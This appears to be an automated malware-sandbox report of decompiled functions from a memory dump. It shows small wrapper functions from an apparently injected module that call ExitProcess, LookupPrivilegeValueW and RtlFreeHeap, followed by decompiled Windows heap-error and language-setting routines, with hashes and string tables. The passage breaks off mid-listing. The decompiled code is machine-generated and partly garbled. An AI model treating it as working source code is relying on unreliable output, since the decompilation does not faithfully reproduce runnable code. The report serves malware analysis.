Function 72498922, Relevance: 1.5, APIs: 1, Instructions: 49
COMMON

Download Yara Rule

C-Code - Quality: 28%

			E72498922(intOrPtr _a4, int _a8) {
				void* _t17;

				asm("in eax, dx");
				asm("loopne 0x5d");
				asm("arpl [ebp-0x74aa6dee], dx");
				asm("adc dl, [edx-0x741374ab]");
				_t8 = _a4;
				E724991E0(_t17, _a4, _a4 + 0xc7c,  *((intOrPtr*)(_t8 + 0xa14)), 0, 0x36);
				ExitProcess(_a8);
			}

0x72498922
0x7249892a
0x7249892c
0x7249892e
0x72498933
0x7249894a
0x72498958

APIs

ExitProcess.KERNEL32(?,?,00000000,?,?,?), ref: 72498958

Memory Dump Source

Source File: 00000005.00000002.779255223.0000000072480000.00000040.00000001.sdmp, Offset: 72480000, based on PE: true

Yara matches

Similarity

API ID: ExitProcess
String ID:
API String ID: 621844428-0
Opcode ID: 2c6471d38acbb87208228cd103cc9cc685393ee69cc6801ef0890dcd7c5277df
Instruction ID: 242810905ed4d2004a5c26e1ad321c14d12af58284e348122d34bbf32827b8bf
Opcode Fuzzy Hash: 2c6471d38acbb87208228cd103cc9cc685393ee69cc6801ef0890dcd7c5277df
Instruction Fuzzy Hash: 350156B2200108BBCB14CFA9DC84EEB7BA9AF9C340F158218FA4C97241C230E911CFA0

Uniqueness

Uniqueness Score: -1.00%

Function 72498A42, Relevance: 1.5, APIs: 1, Instructions: 27
COMMON

Download Yara Rule

C-Code - Quality: 82%

			E72498A42(void* __eax, void* __ebx, intOrPtr _a4, WCHAR* _a8, WCHAR* _a12, struct _LUID* _a16) {
				int _t14;
				signed int _t21;

				asm("clc");
				_t21 =  *0x5A85D802 * 0x6a;
				 *((intOrPtr*)(__eax - 0x74aa0b4f)) =  *((intOrPtr*)(__eax - 0x74aa0b4f)) + __ebx;
				_t11 = _a4;
				E724991E0(_t21, _a4, _a4 + 0xc8c,  *((intOrPtr*)(_t11 + 0xa18)), 0, 0x46);
				_t14 = LookupPrivilegeValueW(_a8, _a12, _a16); // executed
				return _t14;
			}

0x72498a42
0x72498a45
0x72498a4c
0x72498a53
0x72498a6a
0x72498a80
0x72498a84

APIs

LookupPrivilegeValueW.ADVAPI32(00000000,00000041,7248CFC2,7248CFC2,00000041,00000000,?,72488B85), ref: 72498A80

Memory Dump Source

Source File: 00000005.00000002.779255223.0000000072480000.00000040.00000001.sdmp, Offset: 72480000, based on PE: true

Yara matches

Similarity

API ID: LookupPrivilegeValue
String ID:
API String ID: 3899507212-0
Opcode ID: 8e308354349ae988cbb3c70026e046830566578ec6da85d1af7268f034a9101b
Instruction ID: e6546cc0c99ef90ecd901ed15f30973795497e1bb2f41c7bcfcbce36396f0768
Opcode Fuzzy Hash: 8e308354349ae988cbb3c70026e046830566578ec6da85d1af7268f034a9101b
Instruction Fuzzy Hash: DDE030B2604204AFD714DF54DC45ED77B59AF48250F0142A9FD085B251C931AA14CBB4

Uniqueness

Uniqueness Score: -1.00%

Function 72498A50, Relevance: 1.5, APIs: 1, Instructions: 24
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E72498A50(intOrPtr _a4, WCHAR* _a8, WCHAR* _a12, struct _LUID* _a16) {
				int _t10;
				void* _t15;

				E724991E0(_t15, _a4, _a4 + 0xc8c,  *((intOrPtr*)(_a4 + 0xa18)), 0, 0x46);
				_t10 = LookupPrivilegeValueW(_a8, _a12, _a16); // executed
				return _t10;
			}

0x72498a6a
0x72498a80
0x72498a84

APIs

LookupPrivilegeValueW.ADVAPI32(00000000,00000041,7248CFC2,7248CFC2,00000041,00000000,?,72488B85), ref: 72498A80

Memory Dump Source

Source File: 00000005.00000002.779255223.0000000072480000.00000040.00000001.sdmp, Offset: 72480000, based on PE: true

Yara matches

Similarity

API ID: LookupPrivilegeValue
String ID:
API String ID: 3899507212-0
Opcode ID: 6066231f07dbbfb97dda43844c8c8cc76a5ad0e3334111b5d8a4297bdf0bdfe7
Instruction ID: 42c8a8eda208aa3b7ea5a877baaf61df91258a5d744053e6be571dff2580eb6f
Opcode Fuzzy Hash: 6066231f07dbbfb97dda43844c8c8cc76a5ad0e3334111b5d8a4297bdf0bdfe7
Instruction Fuzzy Hash: 4DE01AB12002086BDB10DF89CC85EE737ADAF88650F018154FA0857241C930E910CBF5

Uniqueness

Uniqueness Score: -1.00%

Function 724988F0, Relevance: 1.5, APIs: 1, Instructions: 24
memoryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E724988F0(intOrPtr _a4, void* _a8, long _a12, void* _a16) {
				char _t10;
				void* _t15;

				_t3 = _a4 + 0xc74; // 0xc74
				E724991E0(_t15, _a4, _t3,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x35);
				_t10 = RtlFreeHeap(_a8, _a12, _a16); // executed
				return _t10;
			}

0x724988ff
0x72498907
0x7249891d
0x72498921

APIs

RtlFreeHeap.NTDLL(00000060,72488B13,?,?,72488B13,00000060,00000000,00000000,?,?,72488B13,?,00000000), ref: 7249891D

Memory Dump Source

Source File: 00000005.00000002.779255223.0000000072480000.00000040.00000001.sdmp, Offset: 72480000, based on PE: true

Yara matches

Similarity

API ID: FreeHeap
String ID:
API String ID: 3298025750-0
Opcode ID: c73a038728a0c461ae7389dd2c659cb336152b082840842379cc140023e4f07c
Instruction ID: e4b5d75f35db6b71e24a6522f4d6610811bcdd7db99fa8933b0417ac63d5f9bc
Opcode Fuzzy Hash: c73a038728a0c461ae7389dd2c659cb336152b082840842379cc140023e4f07c
Instruction Fuzzy Hash: F0E046B1200208ABDB18DF99CC49EA77BACEF88750F018558FE085B251CA30FA10CAF0

Uniqueness

Uniqueness Score: -1.00%

Function 72498930, Relevance: 1.5, APIs: 1, Instructions: 20
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E72498930(intOrPtr _a4, int _a8) {
				void* _t10;

				_t5 = _a4;
				E724991E0(_t10, _a4, _a4 + 0xc7c,  *((intOrPtr*)(_t5 + 0xa14)), 0, 0x36);
				ExitProcess(_a8);
			}

0x72498933
0x7249894a
0x72498958

APIs

ExitProcess.KERNEL32(?,?,00000000,?,?,?), ref: 72498958

Memory Dump Source

Source File: 00000005.00000002.779255223.0000000072480000.00000040.00000001.sdmp, Offset: 72480000, based on PE: true

Yara matches

Similarity

API ID: ExitProcess
String ID:
API String ID: 621844428-0
Opcode ID: caa18f4ccbf82a939ed7a560578cfa8cb4ed60065234b72d20cd43f227523b36
Instruction ID: 3ecd92107a919edc2732540dacd2ce57733b2630560f0a569205eb20ffbab114
Opcode Fuzzy Hash: caa18f4ccbf82a939ed7a560578cfa8cb4ed60065234b72d20cd43f227523b36
Instruction Fuzzy Hash: AAD012716042147BD620DB98CC89FD77B9CDF48790F018065BA5C5B241C531BA00CAE1

Uniqueness

Uniqueness Score: -1.00%

Function 04A8967A, Relevance: 1.5, APIs: 1, Instructions: 8libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 04A89694

Memory Dump Source

Source File: 00000005.00000002.777992864.0000000004A20000.00000040.00000001.sdmp, Offset: 04A20000, based on PE: true

Associated: 00000005.00000002.778441591.0000000004B3B000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.778452697.0000000004B3F000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: f59764e698678cb55b4e805b7e2b85dd65f9692737226c74b50ea6c0eb07f3cc
Instruction ID: a41e22ae13b14babd9ab66050694a972c7ed7ae2029bcdbb8f9e54a9ef147dcb
Opcode Fuzzy Hash: f59764e698678cb55b4e805b7e2b85dd65f9692737226c74b50ea6c0eb07f3cc
Instruction Fuzzy Hash: DDB09BB19014C5C5FB11E77047087377944B7D0745F16C065D1021641A4778D4D1F5B6

Uniqueness

Uniqueness Score: -1.00%

Function 00AC0000, Relevance: .0, Instructions: 17COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.775174242.0000000000AC0000.00000040.00000001.sdmp, Offset: 00AC0000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a8f87fc558e2f538fd351bdfc49e2c6aa18e45c6a6d2c8ec1415aa36aaa266a9
Instruction ID: 18b5e61e04c7bcae5a7a9f8a09946595db22e2a0f492063f86ebefdf2a899b08
Opcode Fuzzy Hash: a8f87fc558e2f538fd351bdfc49e2c6aa18e45c6a6d2c8ec1415aa36aaa266a9
Instruction Fuzzy Hash: 33D01275914208EFDB04CF54D84589EBBF5EB44320F20C165E914973A0E731AE509A44

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 04AFB260, Relevance: 37.8, Strings: 30, Instructions: 262COMMON

Download Yara Rule

Strings

*** Inpage error in %ws:%s, xrefs: 04AFB418
This failed because of error %Ix., xrefs: 04AFB446
*** enter .exr %p for the exception record, xrefs: 04AFB4F1
The critical section is owned by thread %p., xrefs: 04AFB3B9
<unknown>, xrefs: 04AFB27E, 04AFB2D1, 04AFB350, 04AFB399, 04AFB417, 04AFB48E
*** Resource timeout (%p) in %ws:%s, xrefs: 04AFB352
a NULL pointer, xrefs: 04AFB4E0
write to, xrefs: 04AFB4A6
The resource is unowned. This usually implies a slow-moving machine due to memory pressure, xrefs: 04AFB38F
Go determine why that thread has not released the critical section., xrefs: 04AFB3C5
*** then kb to get the faulting stack, xrefs: 04AFB51C
*** enter .cxr %p for the context, xrefs: 04AFB50D
This means the data could not be read, typically because of a bad block on the disk. Check your hardware., xrefs: 04AFB47D
*** Critical Section Timeout (%p) in %ws:%s, xrefs: 04AFB39B
*** A stack buffer overrun occurred in %ws:%s, xrefs: 04AFB2F3
The instruction at %p tried to %s , xrefs: 04AFB4B6
The stack trace should show the guilty function (the function directly above __report_gsfailure)., xrefs: 04AFB323
This means that the I/O device reported an I/O error. Check your hardware., xrefs: 04AFB476
This is usually the result of a memory copy to a local buffer or structure where the size is not properly calculated/checked., xrefs: 04AFB305
This means the machine is out of memory. Use !vm to see where all the memory is being used., xrefs: 04AFB484
The instruction at %p referenced memory at %p., xrefs: 04AFB432
an invalid address, %p, xrefs: 04AFB4CF
*** Restarting wait on critsec or resource at %p (in %ws:%s), xrefs: 04AFB53F
The critical section is unowned. This usually implies a slow-moving machine due to memory pressure, xrefs: 04AFB3D6
The resource is owned exclusively by thread %p, xrefs: 04AFB374
*** Unhandled exception 0x%08lx, hit in %ws:%s, xrefs: 04AFB2DC
read from, xrefs: 04AFB4AD, 04AFB4B2
The resource is owned shared by %d threads, xrefs: 04AFB37E
If this bug ends up in the shipping product, it could be a severe security hole., xrefs: 04AFB314
*** An Access Violation occurred in %ws:%s, xrefs: 04AFB48F

Memory Dump Source

Source File: 00000005.00000002.777992864.0000000004A20000.00000040.00000001.sdmp, Offset: 04A20000, based on PE: true

Associated: 00000005.00000002.778441591.0000000004B3B000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.778452697.0000000004B3F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID: *** A stack buffer overrun occurred in %ws:%s$ *** An Access Violation occurred in %ws:%s$ *** Critical Section Timeout (%p) in %ws:%s$ *** Inpage error in %ws:%s$ *** Resource timeout (%p) in %ws:%s$ *** Unhandled exception 0x%08lx, hit in %ws:%s$ *** enter .cxr %p for the context$ *** Restarting wait on critsec or resource at %p (in %ws:%s)$ *** enter .exr %p for the exception record$ *** then kb to get the faulting stack$<unknown>$Go determine why that thread has not released the critical section.$If this bug ends up in the shipping product, it could be a severe security hole.$The critical section is owned by thread %p.$The critical section is unowned. This usually implies a slow-moving machine due to memory pressure$The instruction at %p referenced memory at %p.$The instruction at %p tried to %s $The resource is owned exclusively by thread %p$The resource is owned shared by %d threads$The resource is unowned. This usually implies a slow-moving machine due to memory pressure$The stack trace should show the guilty function (the function directly above __report_gsfailure).$This failed because of error %Ix.$This is usually the result of a memory copy to a local buffer or structure where the size is not properly calculated/checked.$This means that the I/O device reported an I/O error. Check your hardware.$This means the data could not be read, typically because of a bad block on the disk. Check your hardware.$This means the machine is out of memory. Use !vm to see where all the memory is being used.$a NULL pointer$an invalid address, %p$read from$write to
API String ID: 0-108210295
Opcode ID: 028b24442d24aa28809baea4e96a4deec3a158ba73db813a0a26bae3134feef6
Instruction ID: 9376b141ce14b2e04fe040625a780c9950e1fdb279274280436ebc047cad940a
Opcode Fuzzy Hash: 028b24442d24aa28809baea4e96a4deec3a158ba73db813a0a26bae3134feef6
Instruction Fuzzy Hash: 748123B5A40210FFEB216F95CD85EAB3B36BF46B5BF004044F2052B552E365B811DBB6

Uniqueness

Uniqueness Score: -1.00%

Function 04B01C06, Relevance: 31.4, Strings: 25, Instructions: 195
COMMON

Download Yara Rule

C-Code - Quality: 44%

			E04B01C06() {
				signed int _t27;
				char* _t104;
				char* _t105;
				intOrPtr _t113;
				intOrPtr _t115;
				intOrPtr _t117;
				intOrPtr _t119;
				intOrPtr _t120;

				_t105 = 0x4a248a4;
				_t104 = "HEAP: ";
				if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
					_push(_t104);
					E04A4B150();
				} else {
					E04A4B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
				}
				_push( *0x4b3589c);
				E04A4B150("Heap error detected at %p (heap handle %p)\n",  *0x4b358a0);
				_t27 =  *0x4b35898; // 0x0
				if(_t27 <= 0xf) {
					switch( *((intOrPtr*)(_t27 * 4 +  &M04B01E96))) {
						case 0:
							_t105 = "heap_failure_internal";
							goto L21;
						case 1:
							goto L21;
						case 2:
							goto L21;
						case 3:
							goto L21;
						case 4:
							goto L21;
						case 5:
							goto L21;
						case 6:
							goto L21;
						case 7:
							goto L21;
						case 8:
							goto L21;
						case 9:
							goto L21;
						case 0xa:
							goto L21;
						case 0xb:
							goto L21;
						case 0xc:
							goto L21;
						case 0xd:
							goto L21;
						case 0xe:
							goto L21;
						case 0xf:
							goto L21;
					}
				}
				L21:
				if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
					_push(_t104);
					E04A4B150();
				} else {
					E04A4B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
				}
				_push(_t105);
				E04A4B150("Error code: %d - %s\n",  *0x4b35898);
				_t113 =  *0x4b358a4; // 0x0
				if(_t113 != 0) {
					if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
						_push(_t104);
						E04A4B150();
					} else {
						E04A4B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
					}
					E04A4B150("Parameter1: %p\n",  *0x4b358a4);
				}
				_t115 =  *0x4b358a8; // 0x0
				if(_t115 != 0) {
					if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
						_push(_t104);
						E04A4B150();
					} else {
						E04A4B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
					}
					E04A4B150("Parameter2: %p\n",  *0x4b358a8);
				}
				_t117 =  *0x4b358ac; // 0x0
				if(_t117 != 0) {
					if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
						_push(_t104);
						E04A4B150();
					} else {
						E04A4B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
					}
					E04A4B150("Parameter3: %p\n",  *0x4b358ac);
				}
				_t119 =  *0x4b358b0; // 0x0
				if(_t119 != 0) {
					L41:
					if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
						_push(_t104);
						E04A4B150();
					} else {
						E04A4B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
					}
					_push( *0x4b358b4);
					E04A4B150("Last known valid blocks: before - %p, after - %p\n",  *0x4b358b0);
				} else {
					_t120 =  *0x4b358b4; // 0x0
					if(_t120 != 0) {
						goto L41;
					}
				}
				if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
					_push(_t104);
					E04A4B150();
				} else {
					E04A4B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
				}
				return E04A4B150("Stack trace available at %p\n", 0x4b358c0);
			}

0x04b01c10
0x04b01c16
0x04b01c1e
0x04b01c3d
0x04b01c3e
0x04b01c20
0x04b01c35
0x04b01c3a
0x04b01c44
0x04b01c55
0x04b01c5a
0x04b01c65
0x04b01c67
0x00000000
0x04b01c6e
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x04b01c67
0x04b01cdc
0x04b01ce5
0x04b01d04
0x04b01d05
0x04b01ce7
0x04b01cfc
0x04b01d01
0x04b01d0b
0x04b01d17
0x04b01d1f
0x04b01d25
0x04b01d30
0x04b01d4f
0x04b01d50
0x04b01d32
0x04b01d47
0x04b01d4c
0x04b01d61
0x04b01d67
0x04b01d68
0x04b01d6e
0x04b01d79
0x04b01d98
0x04b01d99
0x04b01d7b
0x04b01d90
0x04b01d95
0x04b01daa
0x04b01db0
0x04b01db1
0x04b01db7
0x04b01dc2
0x04b01de1
0x04b01de2
0x04b01dc4
0x04b01dd9
0x04b01dde
0x04b01df3
0x04b01df9
0x04b01dfa
0x04b01e00
0x04b01e0a
0x04b01e13
0x04b01e32
0x04b01e33
0x04b01e15
0x04b01e2a
0x04b01e2f
0x04b01e39
0x04b01e4a
0x04b01e02
0x04b01e02
0x04b01e08
0x00000000
0x00000000
0x04b01e08
0x04b01e5b
0x04b01e7a
0x04b01e7b
0x04b01e5d
0x04b01e72
0x04b01e77
0x04b01e95

Strings

heap_failure_usage_after_free, xrefs: 04B01CBB
Stack trace available at %p, xrefs: 04B01E86
Parameter1: %p, xrefs: 04B01D5C
heap_failure_buffer_overrun, xrefs: 04B01C98
heap_failure_internal, xrefs: 04B01C6E
Last known valid blocks: before - %p, after - %p, xrefs: 04B01E45
heap_failure_entry_corruption, xrefs: 04B01C83
heap_failure_unknown, xrefs: 04B01C75
Parameter3: %p, xrefs: 04B01DEE
Error code: %d - %s, xrefs: 04B01D12
heap_failure_generic, xrefs: 04B01C7C
Parameter2: %p, xrefs: 04B01DA5
Heap error detected at %p (heap handle %p), xrefs: 04B01C50
heap_failure_listentry_corruption, xrefs: 04B01CD0
heap_failure_invalid_allocation_type, xrefs: 04B01CB4
heap_failure_cross_heap_operation, xrefs: 04B01CC2
heap_failure_freelists_corruption, xrefs: 04B01CC9
heap_failure_invalid_argument, xrefs: 04B01CAD
heap_failure_buffer_underrun, xrefs: 04B01C9F
heap_failure_block_not_busy, xrefs: 04B01CA6
heap_failure_multiple_entries_corruption, xrefs: 04B01C8A
heap_failure_virtual_block_corruption, xrefs: 04B01C91
HEAP[%wZ]: , xrefs: 04B01C30, 04B01CF7, 04B01D42, 04B01D8B, 04B01DD4, 04B01E25, 04B01E6D
HEAP: , xrefs: 04B01C16, 04B01C3D, 04B01D04, 04B01D4F, 04B01D98, 04B01DE1, 04B01E32, 04B01E7A
heap_failure_lfh_bitmap_mismatch, xrefs: 04B01CD7

Memory Dump Source

Source File: 00000005.00000002.777992864.0000000004A20000.00000040.00000001.sdmp, Offset: 04A20000, based on PE: true

Associated: 00000005.00000002.778441591.0000000004B3B000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.778452697.0000000004B3F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID: Error code: %d - %s$HEAP: $HEAP[%wZ]: $Heap error detected at %p (heap handle %p)$Last known valid blocks: before - %p, after - %p$Parameter1: %p$Parameter2: %p$Parameter3: %p$Stack trace available at %p$heap_failure_block_not_busy$heap_failure_buffer_overrun$heap_failure_buffer_underrun$heap_failure_cross_heap_operation$heap_failure_entry_corruption$heap_failure_freelists_corruption$heap_failure_generic$heap_failure_internal$heap_failure_invalid_allocation_type$heap_failure_invalid_argument$heap_failure_lfh_bitmap_mismatch$heap_failure_listentry_corruption$heap_failure_multiple_entries_corruption$heap_failure_unknown$heap_failure_usage_after_free$heap_failure_virtual_block_corruption
API String ID: 0-2897834094
Opcode ID: 8cf678c50aad1c5b628d97bb293c2ef840937354362d6acdeaeef7856c383dde
Instruction ID: 66b169c5837ba40606549aca51c9337a8fc8238fb3c4364a71c3eaac195d1def
Opcode Fuzzy Hash: 8cf678c50aad1c5b628d97bb293c2ef840937354362d6acdeaeef7856c383dde
Instruction Fuzzy Hash: 6D61C332612144EFE325DB9DD585E2977A4FB48B33B09C4AAF4095F280E636FC40DE29

Uniqueness

Uniqueness Score: -1.00%

Function 04A53D34, Relevance: 6.7, Strings: 5, Instructions: 435
COMMON

Download Yara Rule

C-Code - Quality: 96%

			E04A53D34(signed int* __ecx) {
				signed int* _v8;
				char _v12;
				signed int* _v16;
				signed int* _v20;
				char _v24;
				signed int _v28;
				signed int _v32;
				char _v36;
				signed int _v40;
				signed int _v44;
				signed int* _v48;
				signed int* _v52;
				signed int _v56;
				signed int _v60;
				char _v68;
				signed int _t140;
				signed int _t161;
				signed int* _t236;
				signed int* _t242;
				signed int* _t243;
				signed int* _t244;
				signed int* _t245;
				signed int _t255;
				void* _t257;
				signed int _t260;
				void* _t262;
				signed int _t264;
				void* _t267;
				signed int _t275;
				signed int* _t276;
				short* _t277;
				signed int* _t278;
				signed int* _t279;
				signed int* _t280;
				short* _t281;
				signed int* _t282;
				short* _t283;
				signed int* _t284;
				void* _t285;

				_v60 = _v60 | 0xffffffff;
				_t280 = 0;
				_t242 = __ecx;
				_v52 = __ecx;
				_v8 = 0;
				_v20 = 0;
				_v40 = 0;
				_v28 = 0;
				_v32 = 0;
				_v44 = 0;
				_v56 = 0;
				_t275 = 0;
				_v16 = 0;
				if(__ecx == 0) {
					_t280 = 0xc000000d;
					_t140 = 0;
					L50:
					 *_t242 =  *_t242 | 0x00000800;
					_t242[0x13] = _t140;
					_t242[0x16] = _v40;
					_t242[0x18] = _v28;
					_t242[0x14] = _v32;
					_t242[0x17] = _t275;
					_t242[0x15] = _v44;
					_t242[0x11] = _v56;
					_t242[0x12] = _v60;
					return _t280;
				}
				if(E04A51B8F(L"WindowsExcludedProcs",  &_v36,  &_v12,  &_v8) >= 0) {
					_v56 = 1;
					if(_v8 != 0) {
						L04A677F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _v8);
					}
					_v8 = _t280;
				}
				if(E04A51B8F(L"Kernel-MUI-Number-Allowed",  &_v36,  &_v12,  &_v8) >= 0) {
					_v60 =  *_v8;
					L04A677F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _v8);
					_v8 = _t280;
				}
				if(E04A51B8F(L"Kernel-MUI-Language-Allowed",  &_v36,  &_v12,  &_v8) < 0) {
					L16:
					if(E04A51B8F(L"Kernel-MUI-Language-Disallowed",  &_v36,  &_v12,  &_v8) < 0) {
						L28:
						if(E04A51B8F(L"Kernel-MUI-Language-SKU",  &_v36,  &_v12,  &_v8) < 0) {
							L46:
							_t275 = _v16;
							L47:
							_t161 = 0;
							L48:
							if(_v8 != 0) {
								L04A677F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t161, _v8);
							}
							_t140 = _v20;
							if(_t140 != 0) {
								if(_t275 != 0) {
									L04A677F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t275);
									_t275 = 0;
									_v28 = 0;
									_t140 = _v20;
								}
							}
							goto L50;
						}
						_t167 = _v12;
						_t255 = _v12 + 4;
						_v44 = _t255;
						if(_t255 == 0) {
							_t276 = _t280;
							_v32 = _t280;
						} else {
							_t276 = L04A64620(_t255,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t255);
							_t167 = _v12;
							_v32 = _t276;
						}
						if(_t276 == 0) {
							_v44 = _t280;
							_t280 = 0xc0000017;
							goto L46;
						} else {
							E04A8F3E0(_t276, _v8, _t167);
							_v48 = _t276;
							_t277 = E04A91370(_t276, 0x4a24e90);
							_pop(_t257);
							if(_t277 == 0) {
								L38:
								_t170 = _v48;
								if( *_v48 != 0) {
									E04A8BB40(0,  &_v68, _t170);
									if(L04A543C0( &_v68,  &_v24) != 0) {
										_t280 =  &(_t280[0]);
									}
								}
								if(_t280 == 0) {
									_t280 = 0;
									L04A677F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _v32);
									_v44 = 0;
									_v32 = 0;
								} else {
									_t280 = 0;
								}
								_t174 = _v8;
								if(_v8 != 0) {
									L04A677F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _t174);
								}
								_v8 = _t280;
								goto L46;
							}
							_t243 = _v48;
							do {
								 *_t277 = 0;
								_t278 = _t277 + 2;
								E04A8BB40(_t257,  &_v68, _t243);
								if(L04A543C0( &_v68,  &_v24) != 0) {
									_t280 =  &(_t280[0]);
								}
								_t243 = _t278;
								_t277 = E04A91370(_t278, 0x4a24e90);
								_pop(_t257);
							} while (_t277 != 0);
							_v48 = _t243;
							_t242 = _v52;
							goto L38;
						}
					}
					_t191 = _v12;
					_t260 = _v12 + 4;
					_v28 = _t260;
					if(_t260 == 0) {
						_t275 = _t280;
						_v16 = _t280;
					} else {
						_t275 = L04A64620(_t260,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t260);
						_t191 = _v12;
						_v16 = _t275;
					}
					if(_t275 == 0) {
						_v28 = _t280;
						_t280 = 0xc0000017;
						goto L47;
					} else {
						E04A8F3E0(_t275, _v8, _t191);
						_t285 = _t285 + 0xc;
						_v48 = _t275;
						_t279 = _t280;
						_t281 = E04A91370(_v16, 0x4a24e90);
						_pop(_t262);
						if(_t281 != 0) {
							_t244 = _v48;
							do {
								 *_t281 = 0;
								_t282 = _t281 + 2;
								E04A8BB40(_t262,  &_v68, _t244);
								if(L04A543C0( &_v68,  &_v24) != 0) {
									_t279 =  &(_t279[0]);
								}
								_t244 = _t282;
								_t281 = E04A91370(_t282, 0x4a24e90);
								_pop(_t262);
							} while (_t281 != 0);
							_v48 = _t244;
							_t242 = _v52;
						}
						_t201 = _v48;
						_t280 = 0;
						if( *_v48 != 0) {
							E04A8BB40(_t262,  &_v68, _t201);
							if(L04A543C0( &_v68,  &_v24) != 0) {
								_t279 =  &(_t279[0]);
							}
						}
						if(_t279 == 0) {
							L04A677F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _v16);
							_v28 = _t280;
							_v16 = _t280;
						}
						_t202 = _v8;
						if(_v8 != 0) {
							L04A677F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _t202);
						}
						_v8 = _t280;
						goto L28;
					}
				}
				_t214 = _v12;
				_t264 = _v12 + 4;
				_v40 = _t264;
				if(_t264 == 0) {
					_v20 = _t280;
				} else {
					_t236 = L04A64620(_t264,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t264);
					_t280 = _t236;
					_v20 = _t236;
					_t214 = _v12;
				}
				if(_t280 == 0) {
					_t161 = 0;
					_t280 = 0xc0000017;
					_v40 = 0;
					goto L48;
				} else {
					E04A8F3E0(_t280, _v8, _t214);
					_t285 = _t285 + 0xc;
					_v48 = _t280;
					_t283 = E04A91370(_t280, 0x4a24e90);
					_pop(_t267);
					if(_t283 != 0) {
						_t245 = _v48;
						do {
							 *_t283 = 0;
							_t284 = _t283 + 2;
							E04A8BB40(_t267,  &_v68, _t245);
							if(L04A543C0( &_v68,  &_v24) != 0) {
								_t275 = _t275 + 1;
							}
							_t245 = _t284;
							_t283 = E04A91370(_t284, 0x4a24e90);
							_pop(_t267);
						} while (_t283 != 0);
						_v48 = _t245;
						_t242 = _v52;
					}
					_t224 = _v48;
					_t280 = 0;
					if( *_v48 != 0) {
						E04A8BB40(_t267,  &_v68, _t224);
						if(L04A543C0( &_v68,  &_v24) != 0) {
							_t275 = _t275 + 1;
						}
					}
					if(_t275 == 0) {
						L04A677F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _v20);
						_v40 = _t280;
						_v20 = _t280;
					}
					_t225 = _v8;
					if(_v8 != 0) {
						L04A677F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _t225);
					}
					_v8 = _t280;
					goto L16;
				}
			}

0x04a53d3c
0x04a53d42
0x04a53d44
0x04a53d46
0x04a53d49
0x04a53d4c
0x04a53d4f
0x04a53d52
0x04a53d55
0x04a53d58
0x04a53d5b
0x04a53d5f
0x04a53d61
0x04a53d66
0x04aa8213
0x04aa8218
0x04a54085
0x04a54088
0x04a5408e
0x04a54094
0x04a5409a
0x04a540a0
0x04a540a6
0x04a540a9
0x04a540af
0x04a540b6
0x04a540bd
0x04a540bd
0x04a53d83
0x04aa821f
0x04aa8229
0x04aa8238
0x04aa8238
0x04aa823d
0x04aa823d
0x04a53da0
0x04a53daf
0x04a53db5
0x04a53dba
0x04a53dba
0x04a53dd4
0x04a53e94
0x04a53eab
0x04a53f6d
0x04a53f84
0x04a5406b
0x04a5406b
0x04a5406e
0x04a5406e
0x04a54070
0x04a54074
0x04aa8351
0x04aa8351
0x04a5407a
0x04a5407f
0x04aa835d
0x04aa8370
0x04aa8377
0x04aa8379
0x04aa837c
0x04aa837c
0x04aa835d
0x00000000
0x04a5407f
0x04a53f8a
0x04a53f8d
0x04a53f90
0x04a53f95
0x04aa830d
0x04aa830f
0x04a53f9b
0x04a53fac
0x04a53fae
0x04a53fb1
0x04a53fb1
